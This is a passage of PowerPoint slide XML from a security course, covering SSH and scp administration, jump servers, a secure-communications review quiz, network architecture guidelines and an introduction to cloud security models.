                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bobby@10.1.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At an SSH prompt, you can now use the standard Linux shell commands. Use exit to close the connection. You can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command to copy a file from the remote server to the local host:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> bobby@10.1.0.10:/logs/audit.log audit.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse the arguments to copy a file from the local host to the remote server. To copy the contents of a directory and any subdirectories (recursively), use the -r option.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27676153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F9909-2988-6BD5-1C35-F2736FDFC67C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Out-of-Band Management and Jump Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39699451-7FA1-B4DF-586E-D554D31CB270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="2142066"/>
            <a:ext cx="5122336" cy="4373033"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A remote access management channel refers to the specific use case of using a secure network and shell application to administer a network switch, router, firewall, or server. The secure administrative workstations (SAWs) used as</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>management clients must be tightly locked down, ideally installed with only the software required to access the administrative channel—minimal web browser, remote desktop client, or SSH virtual terminal, for instance. SAWs should be denied Internet access or be restricted to a handful of approved vendor sites for patches, drivers, and support. The devices must also be subject to stringent access control and auditing so any misuse is detected at the earliest opportunity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Out-of-Band Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Jump Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 414">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D567520-B1FD-EB98-61A3-0644568B2FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5981700" y="1854201"/>
            <a:ext cx="5542468" cy="4660370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2111021822"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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A6137C-6019-6851-AE03-44B9A8D42FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Secure Communications</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BC1E964-C9BD-1D58-3809-F3FE020CF503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? A TLS VPN can only provide access to web-based network resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What IPsec mode would you use for data confidentiality on a private network?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the main advantage of IKEv2 over IKEv1?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What value confirms the identity of an SSH server to a client?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server A is configured to forward commands over SSH to a pool of database servers. The database servers do not accept SSH connections from any other source. What type of configuration does Server A implement?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41354303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0C4F-DB05-EB57-2078-479497920B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="0"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 5 Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD66A8E7-9797-D3D8-281E-3C4EE6A76682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1567543"/>
            <a:ext cx="10464799" cy="5188857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Guidelines for Implementing Secure Enterprise Network Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow these guidelines when you implement designs for new or extended networks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify business workflows and the servers, clients, protocols, and data assets that support them. Design segmented network zones or blocks that support the security requirements, using VLANs, subnets, and firewall policies to implement the design.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deploy switching and routing appliances and protocols to support each block, accounting for port security or 802.1X network access control (NAC).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze the attack surface and select effective controls deployed to appropriate network locations:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deploy port security or 802.1X NAC to mitigate risks from rogue devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attached to physical network ports.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deploy routing firewalls to enforce access control and intrusion prevention at zone perimeters, utilizing layer 4 or layer 7 filtering as appropriate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deploy transparent firewalls to protect hosts and segments without having to</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>change the IP topology.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deploy sensors for intrusion detection behind firewalls or on a mirrored switch port to monitor traffic within a zone.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider the use of proxy servers, NGFW, and WAF for advanced application and user-aware filtering.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider the use of UTM to deploy additional security control capabilities alongside firewall/IPS functionality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design load-balanced services to provision high availability and fault tolerance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accommodate remote access client-to-site, site-to-site, and host-to-host secure communications requirements with TLS and IPsec VPN protocols.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement secure communications for desktop/shell remote access with RDP and SSH. Consider the use of a jump server to consolidate the management of a group of servers in a protected zone.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40757409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FF0AF-62CC-0209-315A-DDE12AEEA8EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 6 Secure Cloud Network Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A225E38A-8CC2-9003-8889-815B1D904ABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595087" y="2015732"/>
            <a:ext cx="10459768" cy="4037749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud network architecture encompasses a range of concepts and technologies designed to ensure the confidentiality, integrity, and availability of data and applications within cloud-based environments. Cloud architecture and modern software deployment practices enable seamless integration, management, and optimization of resources within cloud-based environments. Key features include on-demand provisioning, elasticity, and scalability, which allow rapid deployment and dynamic adjustments to computing, storage, and network resources as required.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize secure cloud and virtualization services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply cloud security solutions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize infrastructure as code concepts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explore the Internet of Things.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review zero trust architecture concepts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15660892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650D-19DA-5DDE-9179-1922E0637F80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 6A - Cloud Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E776E5A3-E255-79DE-4EEF-2FB2E8C03B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955964" y="2015733"/>
            <a:ext cx="10370127" cy="4198032"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understanding cloud platform concepts is crucial for security professionals to effectively protect digital assets, ensure compliance, and manage risk in modern IT environments. As organizations increasingly adopt cloud services, security professionals must be adept at identifying potential vulnerabilities, implementing robust security measures, and monitoring cloud-based resources to mitigate potential threats. Familiarity with cloud platform concepts enables security professionals to navigate the shared responsibility model, where cloud service providers and users collaborate to maintain a secure infrastructure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, understanding cloud technologies is essential for developing tailored security strategies, embracing best practices, and adhering to regulatory requirements. As cloud computing continues to evolve rapidly, security professionals must stay up-to-date with the latest advancements and threat landscapes to safeguard their organizations’ valuable data and resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28540784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AC639-1B12-2E23-D822-DC981B4AF193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Deployment Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959206AE-D6EA-BB45-673C-2EA0452BAE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cloud deployment model classifies how the service is owned and provisioned. It is important to recognize that deployment models have different impacts on threats and vulnerabilities. Cloud deployment models can be broadly categorized as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Public (or multi-tenant)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hosted Private</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25265489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58FAA-1660-59B2-C9D5-F3D231CC3C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DA043C-2289-6A74-C437-8FB71859DFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different cloud architecture models have varying security implications to consider when deciding which one to use.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Single-tenant architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Multi-tenant architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hybrid architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Serverless architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3147689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C6C42-AFED-44BD-0470-CE60ED3BF5D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C8CD485-5D44-CCBD-1940-B96B9BE67C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4405313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Development and operations (DevOps) is a cultural shift within an organization to encourage much more collaboration between developers and systems administrators. By creating a highly orchestrated environment, IT personnel</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and developers can build, test, and release software faster and more reliably. </a:t>
            </a:r>
            <a:r>
